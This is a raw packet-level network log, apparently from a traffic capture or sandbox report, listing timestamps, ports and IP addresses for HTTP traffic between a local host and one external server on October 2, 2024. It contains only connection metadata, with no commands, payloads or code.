Oct 2, 2024 09:41:27.087090015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087121010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087152958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087183952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087215900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087248087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087255001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087255001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087255001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087255001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087255001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087255001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087279081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087311029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087342978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087373972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087408066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087408066 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087426901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087459087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087491035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087522984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087553978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087585926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087616920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087651968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087682009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087713957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087719917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087719917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087719917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087719917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087719917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087719917 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.087744951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087779045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087811947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087843895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087876081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087908983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.087944984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.088821888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.088821888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.088821888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.088821888 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.089355946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173078060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173122883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173177958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173212051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173247099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173280001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173285961 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173285961 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173285961 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173285961 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173285961 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173330069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173363924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173413038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173463106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173494101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173562050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173594952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173645020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173676968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173682928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173682928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173682928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173682928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173682928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173682928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173729897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173760891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173813105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173844099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173877001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173907995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173913956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173913956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173913956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173913956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173914909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173914909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.173939943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.173989058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174021006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174069881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174102068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174134016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174165010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174195051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174226999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174259901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174278975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174278975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174278975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174278975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174278975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174278975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174309969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174339056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174370050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174401045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174432039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174468040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174499035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174530983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174576044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174607992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174613953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174613953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174613953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174614906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174614906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174614906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174638987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174670935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174717903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174751043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174782991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174815893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174846888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174897909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174926043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174957037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.174964905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174964905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174964905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174964905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174966097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174966097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.174989939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175021887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175054073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175085068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175123930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175172091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175204039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175251961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175283909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175331116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175363064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175371885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175371885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175371885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175371885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175371885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175371885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175445080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175477028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175508976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175543070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175574064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175606012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175637007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175749063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175749063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175749063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175749063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175749063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.175784111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175816059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175848007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175879955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175913095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175945044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.175976038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176007032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176038027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176045895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176045895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176045895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176045895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176045895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176045895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176069975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176101923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176134109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176165104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176202059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176233053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176265955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176296949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176328897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176359892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176368952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176369905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176369905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176369905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176369905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176369905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176392078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176423073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176455021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176486015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176517963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176551104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176583052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176614046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176645041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176676035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176685095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176685095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176685095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176685095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176685095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176685095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.176707983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176738977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176774025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176806927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176837921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176870108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176902056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176932096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176964045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.176995039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177000999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.177000999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.177000999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.177000999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.177000999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.177000999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.177026033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177053928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177086115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177117109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177149057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177181005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177212000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177243948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.177275896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.178354025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.178354025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.178354025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.178354025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.178354025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.179815054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261203051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261270046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261321068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261353016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261401892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261435032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261467934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261517048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261519909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261519909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261519909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261519909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261521101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261521101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261549950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261583090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261616945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261648893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261681080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261720896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261720896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261720896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261720896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261722088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261722088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.261733055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261766911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261795998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261846066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261900902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261931896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.261981964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262021065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262021065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262021065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262022018 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262022018 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262022018 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262029886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262063026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262094975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262144089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262176037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262224913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262258053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262290001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262339115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262393951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262443066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262445927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262445927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262445927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262445927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262447119 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262447119 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262475967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262523890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262554884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262587070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262635946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262670040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262701035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262728930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262763023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262804031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262804031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262804031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262804031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262804031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262804031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.262814045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262845993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262877941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262909889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262958050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.262989044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263021946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263052940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263084888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263134956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263166904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263206959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263206959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263206959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263206959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263206959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263206959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263216019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263248920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263278961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263313055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263360977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.263415098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.263415098 CEST	49749	80	192.168.2.4	46.8.231.109
